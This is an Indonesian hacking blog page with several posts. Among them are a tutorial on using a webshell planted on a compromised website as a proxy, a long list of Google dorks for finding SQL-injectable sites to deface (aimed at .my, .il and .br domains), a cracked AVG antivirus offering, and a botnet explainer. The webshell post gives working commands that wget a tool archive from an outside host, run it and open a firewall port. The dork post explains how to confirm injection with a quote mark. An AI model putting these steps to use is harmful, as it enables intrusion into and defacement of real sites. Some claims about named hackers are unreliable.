Headlines News :

Sedikit Tentang BOTNET

Written By Unknown on Sabtu, 17 Agustus 2013 | 06.45

Selamat Pagi Pengunjung.. :) :) Ketemu Lagi..Sekarang Kita Mau Kasih Tau Sedikit Tentang Botnet Yuk Langsung Aja.. 

Botnet, atau Robot Network, atau Pasukan Zombie, adalah idiom untuk sekelompok komputer yang telah diinfeksi oleh software-software jahat (malware). atau botnet merupakan kegiatan menyusupkan program-program tertentu kepada server-server komputer dimana program-program tersebut biasanya disusupkan sebagai worms, Trojan horse, atau backdoors, di bawah perintah Master Refer dan dikendalikan dengan sebuah remote. Kemudian malware yang disusupkan pada komputer tersebut bertugas untuk mencuri data-data penting (login, informasi credit card dan sebagainya), kemudian menginfeksi komputer lain.

Jika komputer yang diinfeksi adalah komputer seorang webmaster, maka malware bisa juga menyusup ke server website ketika webmaster sedang mengupload file-file website. Website yang tanpa disadari telah disusupi malware, dapat dipakai untuk berbagai tujuan yang jahat. Di antaranya: sebagai media penyebaran malware ke komputer-komputer visitor, pencurian password (scam), mass-email ke ratusan ribu alamat (spam), mencuri data website anda (theft), penipuan pay-per-click (abuse) dan membuat IP server anda diblacklist oleh berbagai layanan.

Program-program botnet tersebut menyebar ketika IRC “bots”. Diperintahkan dan kendali berlangsung via satu server IRC atau suatu saluran yang spesifik di suatu jaringan publik. Suatu bot pada umumnya tersembunyi, dan mematuhi perintah dari RFC 1459 (IRC) sebagai patokan. Secara umum, botnet menyebar kepada berbagai infrastrukktur jaringan server komputer, Bots lebih baru dapat secara otomatis meneliti lingkungan mereka dan menyebarkan diri mereka menggunakan sifat mudah kena luka dan kata sandi yang lemah. Secara umum, semakin banyak kerentanan suatu software suatu bot dapat dengan mudah menyebar. Proses tentang pencurian sumber daya komputasi sebagai hasil suatu sistim pada “botnet” kadang-kadang dikenal sebagai “scrumping”.

Botnets sudah menjadi suatu bagian penting dari keamanan jaringan Internet,karena sifatnya yang tersembunyi pada jaringan server internet. Sering kali, suatu botnet akan masuk di dalam bermacam koneksi-koneksi, seperti telepon, ADSL dan kabel(telegram, dan bermacam jaringan, termasuk bidang pendidikan, [perseroan/perusahaan], pemerintah dan bahkan jaringan militer. Kadang-kadang menyembunyikan satu instalasi server IRC di satu bidang pendidikan atau lokasi [perseroan/perusahaan], di mana koneksi-koneksi yang kecepatan tinggi dapat mendukung sejumlah besar bots yang lain.

Beberapa botnets telah ditemukan dan yang dipindahkan dari Internet. Belanda metemukan 15 juta simpul botnet dan Orang Norwegia ISP Telenor menemukan 10,000-node botnet . Usaha-usaha besar untuk mengkoordinir secara internasional menutup botnets telah pula dilakukan. diperkirakan bahwa sampai seperempat jumlah dari semua komputer pribadi yang tersambungkan ke internet itu boleh menjadi bagian dari suatu botnet. Laporan ENISA (European Network and Information Security Agency), Botnet diam diam mengancam hampir 6 juta komputer yang terhubung ke internet yang disinyalir sudah terinfeksi. Botnet sebenarnya buka masalah,tetapi menjadi berbahaya seandainya dibelakang nya ada sindikat criminal. Misalnya program botnet masuk ke komputer tanpa diketahui oleh pemiliknya, lalu mengendalikan komputer yang telah terinfeksi tersebut untuk kejahatan internet seperti mencuri data pribadi,mengirim email, penipuan via email atau serangan masal seperti spamming.

Apalagi kita tidak mengetahui dimana si Master refer berada sehingga menyulitkan untuk mencari siapa yang mengirim program botnet tersebut. Dimana sebagian Negara besar seperti China, Amerika, Jerman, Spanyol dan perancis sudah menjadi korban botnet yang umumnya botnet menggunakan kelemahan dari browser misalnya dari internet explorer. Kelemahan ini dimanfaatkan oleh pengirim botnet untuk menginfeksi dan 60 % kejadian biasanya berasal dari pengguna yang mencoba mengklik sebuah link di internet sehingga komputer langsung terinfeksi. Sedangkan cara lain malah lebih kecil seperti file dalam attachment email hanya 13 %, kelemahan system operasi 11%, dan terakhir mendownload file internet 9 %.

Mengetahui sebuah komputer telah disusupi program botnet biasanya komputer menjadi lambat lalu perubahan tampilan browser seperti alamat, home page yang berubah, anti virus tidak aktif dan program yang suka me restart sendiri. Untuk menghadapi botnet usahakan jangan mengklik sembarangan yang tidak dikenal karena bisa saja link tersebut malah mengarahkan user internet untuk mendownload program botnet.

TYPICAL BOT LIFECYCLE

Terlepas dari topologi yang digunakan, model bot lifecycle adalah sebagai berikut:

› Creation. Botmaster akan mengembangkan software bot-nya dengan cara memperbaiki kode yang sudah ada atau menambahkan beberapa fitur di dalam botnya.

› Infection. Ada beberapa cara kemungkinan yang dilakukan oleh bot dalam menginfeksi komputer yang menjadi korbannya, contohnya: software vulnerabilitas, Drive-by download, Trojan horse, email attachment,dan lain-lain.

› Rallying. Setelah bot mengambil alih hak komputer korban, bot akan mengumpulkan informasi-informasi yang dibutuhkan yang akan dilaporkan pada botmaster.

› Waiting. Sambil mengumpulkan informasi, bot akan menunggu perintah yang berasal dari botmaster melalui C&C Server.

› Executing. Apabila botmaster telah mendapatkan informasi yang dibutuhkan maka melalui Server C&C, botmaster akan memberikan perintah kepada bot untuk melakukan aktifitas kejahatan seperti DDoS, sending spam, dan sebagainya.

SEJARAH BOTNET

Sebelum Botnet muncul, virus dan worm merupakan salah satu ancaman yang berbahaya bagi dunia internet. Dimana attacker dapat menggunakan worm dan virus untuk mengontrol/menginfeksi komputer dari jarak jauh. Namun, apabila komputer yang telah diambil alih oleh attacker dilakukan sebuah pembersihan dan protection maka attacker tidak bisa lagi mengontrol komputer tersebut. Contohnya : Melissa email worm (1999), ILOVEYOU (2000), Code Red (2001), Slammer (2003), dan Sasser (2004).

Konsep bot dalam me-remote komputer awalnya muncul dari Internet Relay Chat (IRC). Dimana pada mulanya bot di buat untuk membantu administrator dalam mengendalikan channel-channel yang terdapat pada IRC. Salah satu contoh implementasi bot pada IRC adalah “eggdrop”. Eggdrop dikembangkan pada tahun 1993 dan merupakan IRC bot yang paling popular. Seiring dengan waktu, attacker mulai menyadari bahwa bot tersebut dapat digunakan untuk hal-hal yang bersifat kejahatan karena dapat dikontrol dan dikendalikan melalui sebuah server yang disebut C&C Server. Akibat dari prinsip itulah maka lahirlah jenis-jenis botnet yang lain yang lebih powerfull dari eggdrop.

Cara Membuat Proxy Menggunakan WebShell

Bissmillahir rahmanir rahim .. 
Ketemu Di Pagi Hari Lagi Kita
kali ini saya mau berbagi untuk kalian yang belum paham akan tutorial ini .,

jadi gini Sebelumnya saya mau menjelaskan sedikit tentang kegunaan Ip proxy ..
Kegunaan Proxy ketika kita mengunjungi situs, membuat tulisan secara online, mengirimkan pesan, dan email tanpa nama yang tidak dapat dilacak oleh IP address komputer., mempercepat proses transfer data dan pada saat yang bersamaan dapat mengakses situs-situs yang diblokir oleh penyedia layanan internet (ISP) . Selain menyediakan akses ke situs-situs yang diblokir, beberapa penyaring proxy juga memblokir situs-situs tertentu dan server, sehingga proxy juga dapat digunakan untuk memblokir server penyedia layanan internet (ISP).

jadi , biasanya dalam sebuah cyber war ., ip kita akan di blok oleh ISP internet victim , contohnya myanmar . beberapa website memblokir ip indonesia dengan alasan untuk sebuah keamanan .

nah , berkaitan dengan tutorial ini .,
bagaimana cara kita untuk membuat sebuah Ip Proxy Sendiri dengan Memanfaatkan web yang sudah kita tanam sebuah backdoor ..??

sebenarnya kegunaan sebuah webshell ( Backdoor Yang sudah Kita Tanam Ke dalam Website ) sangat banyak ., namun masih banyak yang belum tau akan kegunaannya.. nah Beberapa Manfaat dari sebuah webshell dengan Server yang bagus :
- Buat Server (Jika Open Port)
- Root (Open Port untuk backconnect)
- Irc Server

dan masih banyak lagi ., tergantung kebutuhan .. 

Langsung Ke tutorial .. 

1. Sebelumnya silahkan anda mengecek dulu ip website yang sudah anda sisipkan backdoor . silahkan menggunakan cara anda sendiri .

2. jika sudah mendapatkan Ipnya ., silahkan di simpan dulu . kemudian kembali ke webshell . dalam tutorial ini saya menggunakan telnet yang sudah saya eksekusi ke dalam webshell . nah jika sudah . 

ketikkan :
- wget http://xcrotz.org/tools/proxy.tar.gz

http://prntscr.com/19xktb

3. Kemudian Extract File tadi dengan mengetikkan 
- tar -zxvf *gz;rm -rf *.gz
http://prntscr.com/19xl5j

4. Selanjutnya Masuk kedalam direktory Pro ., dan mengetikkan 
- chmod +x *
http://prntscr.com/19xlec

5. langkah terakhir ., untuk Run / mengaktifkan Proxy Webshell anda .
- ./xh -s ./httpd ./prox -a -d -p9000
http://prntscr.com/19xlpx

Note : -p9000 artinya port 9000

jadi silahkan port berapa aja ., tergantung berapa port yang terbuka .. 

sampai situ ip webshell anda sudah bisa di gunakan ., 
tapi tergantung open port yang anda gunakan ., sekali lagi silahkan cek port webshell anda menggunakan cara anda sendiri . 

atau juga bisa menggunakan 
iptables -I INPUT -p tcp --dport 9000 -j ACCEPT

tergantung server webshell anda .. 

Trik Mengatasi Tombol Fn Tidak Berfungsi

Hello Sobat .. Ketemu Lagi Kita.. Maaf Tidak Posting .. Karena Ada Ujian hehehe.. :D.. Sekarang Saya Akan Memberi Trik Cara Mengatasi Tombol Fn Yang Tidak Berfungsi 
Yuk Langsung Aja 
Belom Tau Tombol Fn Buat Apaan ? tombol Fn itu semacam tombol Shift pada Keyboard , dan tombol Fn ini adanya cuma di laptop . Fn ini berasal dari kata Function dan di Keyboard Laptop/Netbook tombol ini digunakan untuk sebuah Hotkey , seperti Wifi , Brightness, Sound , Numpad dll , nah yang jadi pertanyaan temen saya waktu abis Install Windows 8 , kenapa nggak bisa pakai Wifi ? di tekan tombol Fn + Hotkey Wifi juga ngak bisa . wah tanda tanya nih .. setelah gw lihat Drivernya , Eh ternyata si Driver Hotkey masih belum ter Install ,

Oh ya bagi yang belum tahu nih gambar Fn di Keyboard

dan bagi anda yang masih kebingungan karena tombol Fn tidak berfungsi bisa Klik Link di bawah ini

Hotkey

 Untuk mencarinya anda bisa menyesuaikan dengan Tipe Laptop anda ,, terima kasih telah membaca Artikel singkat ini , semoga bisa bermanfat :) thanks all Mengatasi Tombol Fn tidak Berfungsi Windows 8


Sumber : Click This !

Pilih AMD atau Intel ??

Advanced Micro Devices (AMD) dan Intel adalah dua perusahaan yang memproduksi motherboard dan central processing unit (CPU) komputer pribadi (PC).
CPU atau prosesor merupakan bagian terpenting dari komputer karena segala perhitungan untuk menjalankan berbagai program terjadi disana.
Kecepatan CPU dalam memproses perhitungan umumnya dinyatakan dalam megahertz (MHz) atau gigahertz (GHz).
Sedangkan fungsi motherboard adalah sebagai tempat atau sirkuit agar komputer dapat berfungsi.
AMD dan Intel sama-sama menawarkan berbagai CPU (prosesor) dengan jenis dan kecepatan yang berbeda. Hanya saja, Intel memiliki persentase penguasaan pasar lebih besar dibanding AMD.
Kedua perusahaan telah membuat komponen komputer selama beberapa dekade, dan bisa dikatakan menjadi pemimpin dalam penelitian dan pengembangan dalam produk yang menjadi fokus mereka.
Karena merupakan perusahaan yang berbeda, akan sulit untuk membandingkan produk yang dibuat oleh keduanya.
Salah satu perbedaan paling terlihat adalah bahwa harga AMD cenderung lebih murah dibanding Intel.
Intel telah menjadi pemimpin pasar dalam produksi motherboard dan CPU sejak awal.
Sebagai perusahaan yang datang belakangan, tidak dapat dihindarkan AMD dipengaruhi oleh harga dan produk Intel.
Sebagai contoh, selain chip prosesor kreasi sendiri, terdapat beberapa produk AMD yang merupakan kloning dari Intel.
Sebagian orang memilih AMD karena AMD menyediakan fungsionalitas yang hampir sama, tapi dengan harga yang lebih murah dari Intel.
Selain biaya, perbedaan lainnya antara prosesor AMD dan Intel adalah pada ‘clock speed’ dan soket yang digunakan untuk menghubungkan prosesor ke komputer.
Clock speed merupakan jumlah operasi komputer yang dapat dilakukann dalam satu siklus clock, yang biasanya satu detik.
Karena perbedaan desain, prosesor Intel umumnya lebih cepat dari AMD, namun prosesor AMD dianggap lebih efisien.
Perbedaan soket merupakan faktor penting untuk dipertimbangkan pula. Setiap jenis prosesor mungkin memiliki konektor berbeda sehingga tidak bisa saling dipertukarkan.
Artinya, jika hendak mengganti (upgrade) prosesor, Anda harus mengganti dengan merek yang sama.[]

Quiz Parampaa 1 & 2

Written By Unknown on Jumat, 16 Agustus 2013 | 07.58

Quiz Parmpaa Adalah Game Asah Otak. Perlu Fokus dan Konsentrasi Yang Tinggi Untuk Dapat Menyelesaikan Game Tersebut. Bila Kamu Bisa Nyelesaiin Game Ini.. Berarti Kamu Mempunyai IQ Yang Tinggi :) . Nah Game Flash Ini Dapat Bermain Secara Offline. Oh Iya.. Nanti Kamu Mendapatkan Password Agar Loncat Level..
Nah Untuk Link Download Bisa Lihat Dibawah
Link Download :

Nah Game Nya Sebenarnya Ada Kunci Jawabannya
Untuk Kunci Jawaban Bisa Contact Saya :P

Game Yang Tidak Boleh Dimainkan

Hello Sahabat blogger,saya akan membagikan Game Yang Tidak Boleh Dimankan.mungkin ada game yang tidak boleh dimainkan karena mengandung sesuatu yang tidak boleh dimainkan oleh anak2 seperti GTA SA,GTAIV namun game yang saya Share ini tidak boleh dimainkan karena game ini sangat berbahaya dimainkan.game itu adalah Game LOSE
Game Lose ini adalah Game berbahaya di komputer karena dapat menghapus file-file yang ada di komputer/Laptop anda.anda diminta untuk membunuh Alien yang berada di sekitar anda,namun alien itu adalah file yang ada di PC anda,jika anda mematikan alien terebut maka 1 file anda akan kehapus permanen,wow gimana kalau semua alien di bunuh,bisa berbahaya tuh :)
jika anda berminat mendownloadnya silahkan download dibawah ini
RESIKO DI TANGGUNG PENDOWNLOAD!

5 Hacker Wanita

5 Hacker Wanita Di Dunia -  Hacking, dunia bawah tanah keras nan unik. Kebanyakan ahli-ahli dalam bidang hacking didominasi oleh kalangan pria. Tapi, siapa sangka ternyata wanita juga banyak ambil bagian dalam dunia ini. Kemampuan serta kiprahnya pun tidak kalah dengan kaum adam. Berikut ini bahasan 5 Hacker Wanita di Dunia.





1. Ying Cracker
ying Cracker, seorang pengajar dari shanghai Cina. Dia mengajar tentang panduan dasar proses hacking, cara merubah IP address atau memanipulasi password kantor!
Dia juga ahli dalam membuat software hacker.
Dalam sebuah forum yang berjudul Chinese Hottie Hackers, namanya banyak dibahas dan itu membuat popularitasnya semakin menanjak. Dalam forum tersebut juga dia mempunyai anggota fans yang cukup banyak. Disitulah awal kredibilitasnya melambung.
2. Xiao Tian
Teringat dengan kata hacker, biasanya yang terlintas di bayangan adalah seorang kutu buku dengan kaca mata tebal dengan gaya hidup yang acak-acakan. Tapi tidak berlaku untuk Xiao Tian. Dia adalah seorang hacker yang modis.Penampilan dan gaya hidupnya begitu rapi, dinamis bahkan terkesan feminim.
ia juga tertarik sekali dengan dunia fashion, khususnya sepatu. Dalam blog nya dia sering berbagi cerita tentang tempat-tempat yang pernah dia datangi. Itulah alasan mengapa Xiao memiliki banyak fans dan followers di dunia, khususnya para pria.
Xiao Tian, mulai dikenal sejak umur 19 tahun. Setelah membentuk China Girl Security Team, salah satu kelompok hacker khusus wanita terbesar di china. Kiprahnya dalam dunia hacking juga tidak diragukan lagi. Raksasa search engine nomor satu di dunia, Google pun pernah merasakan serangan hebat dari Tian beserta timnya. Xiao Tian melakukan serangan canggih terhadap sistem infrastruktur google china. Bahkan, google akhirnya tidak tahan dan memilih untuk menarik semua layanan operasionalnya di China akibat hantaman hacker yang bertubi-tubi tersebut.
3. Joanna Rutkowska
Joanna Rutkowska adalah seorang wanita polandia yang tertarik dengan dunia hacking security. Namanya pertama kali dikenal setelah konferensi Black Hat Briefings di Las Vegas, agustus 2006. Dimana saat itu Rutkowska mempresentasikan proses serangan yang telah dia lakukan terhadap sistem keamanan windows vista. Tidak hanya itu, Rutkowska juga pernah menyerang Trusted Execution Technology dan System Management Mode milik Intel.
Awal 2007 dia membentuk Invisible Things Lab di Warsawa, Polandia. Sebuah perusahaan yang berfokus terhadap research keamanan OS juga VMM serta layanan konsultasi keamanan internet. Tahun 2010 juga Rutkowska bersama Rafal Wojtczuk membentuk Qubes, sebuah Operating System yang sangat full protect security. Rutkowska juga pernah memberikan saran terbuka untuk Vice President of Microsoft Security Technology Unit untuk lebih memperketat sistem keamanan dalam windows vista. Waw, Rutkowska memang seorang hacker yang sangat welcome untuk diajak bekerjasama.
4. Kristina Svechinskaya
Kristina Svechinskaya adalah seorang mahasiswi New York University yang ditahan pada 2 november 2010 lalu karena telah membobol jutaan dollar dari beberapa bank di Inggris dan Amerika. Bersama 9 orang lainya, Svechinskaya meng-hack ribuan rekening bank dan diperkirakan total fresh money yang telah digasaknya itu sekitar 3 juta dollar.
Svechinskaya beserta tim awalnya menargetkan jumlah uang yang dicurinya adalah sekitar 220 juta dollar. Svechinskaya menggunakan Zeus Trojan Horse untuk menyerang ribuan rekening bank. Dia memiliki setidaknya 5 rekening bank dunia untuk mencairkan dananya. Dalam aksinya itu, Svechinskaya juga melakukan pemalsuan paspor dan untuk itu total dia dituntut hukuman 40 tahun penjara bila terbukti bersalah. Seperti dilihat di gambar, bra yang digunakan gadis cantik ini terbuat dari berlian. Svechinskaya juga mendapat julukan sebagai hacker terseksi di dunia. Ya, karena memang tampilan wajah, tatapan mata dan gaya berbusana Svechinskaya bisa membuat orang-orang tak berkedip.
5. Raven Adler
Di urutan terakhir, kita punya Raven Adler. Seorang wanita berpenampilan gothic yang tertarik dengan dunia internet, khususnya dunia hacking. Raven adalah wanita pertama yang pernah hadir dalam konferensi hacker DefCon. Perhatian konferens tentu saja tertuju penuh untuknya. Tapi dia mengaku tidak ingin memanfaatkan gender nya sebagai wanita untuk mendongkrak kredibilitasnya sebagai hacker. Dalam banyak kesempatan pula, dia tidak begitu senang dipanggil dengan sebutan ‘Hacker Wanita. Dia lebih senang dipandang karena skill nya, bukan karena posisinya yang spesial sebagai seorang wanita.

Saat ini dia aktif mendesign, menguji dan mengaudit sistem detektor keamanan untuk berbagai agen-agen federal besar. Selain itu, di sela-sela kesibukanya dia juga telaten mempelajari ilmu beladiri Ryu Shorin Matsumura.

Kumpulan Dork Untuk Deface Website














Dork SQL :


intext:"error in your SQL syntax" +site:my
intext:"mysql_num_rows()" +site:il
intext:"mysql_fetch_array()" +site:br
intext:"Error Occurred While Processing Request" +site:il
intext:"Server Error in '/' Application" +site:my
intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:br
intext:"Invalid Querystring" +site:my
intext:"OLE DB Provider for ODBC" +site:my
intext:"VBScript Runtime" +site:my
intext:"ADODB.Field" +site:my
intext:"BOF or EOF"+site:my intext:"ADODB.Command" +site:my intext:"JET Database" +site:my
intext:"mysql_fetch_row()" +site:my intext:"Syntax error" +site:my intext:"include()" +site:my
intext:"mysql_fetch_assoc()" +site:my intext:"mysql_fetch_object()" +site:my intext:"mysql_numrows()" +site:il
intext:"GetArray()" +site:my intext:"FetchRow()" +site:my
intext:"Input string was not in a correct format" +site:my

allinurl:xml.php?id=
allinurl:xml.php?code=
allinurl:xml.php?code= module_ID=

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
nurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id= inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:newsDetail.php?id=
inurl:staff_id=
inurl:historialeer.php?num=
inurl:product-item.php?id=
inurl:news_view.php?id=
inurl:humor.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:chappies.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gery.php?id=
inurl:detail.php?ID=
inurl:publications.php?id=
inurl:Productinfo.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id= section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:channel_id=
inurl:newsid=
inurl:news_display.php?getid=
inurl:ages.php?id=
inurl:clanek.php4?id=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:look.php?ID=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:offer.php?idf=

"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()

inurl:index.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:newsitem.php?num=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl: forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:announce.php?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:product-item.php?id=
inurl:pages.php?id=
inurl:clanek.php4?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:galeri_info.php?l=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:aboutbook.php?id=

"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()

Untuk mengetahui vulnerability'nya, anda tambahkan tanda petik ' pada belakang url dari hasil dork tersebut. Misal www.site.com/curriculum.php?id=30' atau www.site.com/curriculum.php?id='30 jika ditemui tulisan seperti syntax error berarti web tersebut dapat kita eksekusi

Selamat Bereksperimen :D

AVG Antivirus Full Version

Antivirus AVG + Crack - Hello Guys Sudah Pada Sarapan Belumm.. :D
Sambil Baca Artikel Ini Sambil Makan Juge Brohh.. :D
Sekarang Saya Akan Share Antivirus AVG Full Version ..


Kelebihan :


- Mempunyai Maintainability Cukup Tinggi

- Otomatis Update Sendiri Jika Terkoneksi Dengan Internet
- Setiap Hari Update Antivirus AVG
- Scanning Virus Yang Cepat
- Saat Scanning Virus Tidak Memperlambat Kinerja PC atau Laptop

Langsung Download Aja Yah...


Link Download :

AVG Antivirus Full Version

Mengecek Virus Sebuah File Dengan VirusTotal Via Website

Mengecek Virus Sebuah File Dengan VirusTotal - Ane Mau Ngasih Tau Cara Ngecek File [ .RAR / .ZIP / .dll ] Yang Ada Virusnya














Nah Sekarang Ane Kasih Tau Caranya...

Step Per Step Yo Guy's


1. Buka Website VirusTotal

2. Upload File Kamu .. Caranya Klik ' Choose File ' Lalu Pilih File Yang Ingin Di Cek.. [ Max File 64 MB ]
3. Setelah Di Upload.. Kamu Klik ' Scan It! '
4. Jika Filenya Tidak Bervirus Setiap Result Bertanda Ceklis Hijau
5. Kalau Filnye Bervirus Setiap Result Bertanda Silang Merah

Cara Membuat Kabel Jaringan Stright / Cross

Written By Unknown on Kamis, 15 Agustus 2013 | 09.05

Cara Membuat Kabel Jaringan MRR Cyber

Kali ini saya repost dari sahabat blogger yang kebetulan juga saya ingin tahu cara membuat/ Mengkrimping Kabel RJ45 dan Urutan Kabel Straight & Cross untuk bisa membuat jaringan pada komputer yang terbuhung secara online ke internet/lokalSelain bermanfaat bagi saya dan anda juga yang ingin belajar membuat kabel jaringan lan sendiri. Ikuti saja langkah – langkahnya dibawah ini.

Sebelum memulai, tentu kita harus punya alat untuk mengkrimping seperti : 

  • Tank Crimping
  • Kabel UTP
  • Konektor RJ-45
  • Cable Tester

Tank Crimping

Tank krimping adalah alat untuk memotong kabel UTP dan untuk menjepit ujung konektor,dan ini sangat penting sekali bagi kita yang ingin belajar cara mengkrimping kabel,alat ini bentuknya hampir sama dengan Tank biasa yang sering kita lihat atau temui. Dan di bawah ini adalah gambar tank crimping :


Kabel UTP
Kabel UTP perlu kita gunakan untuk saling menyalurkan jaringan internet,dan di dalam kabel UTP ini di dalamnya ada 8 helai kabel kecil yang berwarna-warni,dan ini warna kabel kecil yang ada di dalam kabel UTP :

